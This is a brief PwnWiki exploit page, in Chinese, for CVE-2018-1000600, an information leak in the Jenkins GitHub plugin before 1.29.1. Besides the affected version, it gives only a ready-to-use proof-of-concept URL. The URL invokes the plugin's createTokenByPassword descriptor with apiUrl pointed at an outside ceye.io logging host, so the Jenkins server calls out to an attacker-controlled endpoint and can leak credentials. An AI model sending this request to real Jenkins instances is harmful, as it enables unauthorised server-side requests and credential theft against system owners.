CVE-2018-1000600 Jenkins GitHub 信息泄漏

From PwnWiki
Other languages:
Chinese • ‎English • ‎中文(繁體)‎

影響版本

Jenkins GitHub插件小於1.29.1

利用的POC如下,其中user1為用戶名。 

/securityRealm/user/user1/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://xxx.ceye.io
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2018-1000600_Jenkins_GitHub_信息泄漏&oldid=284"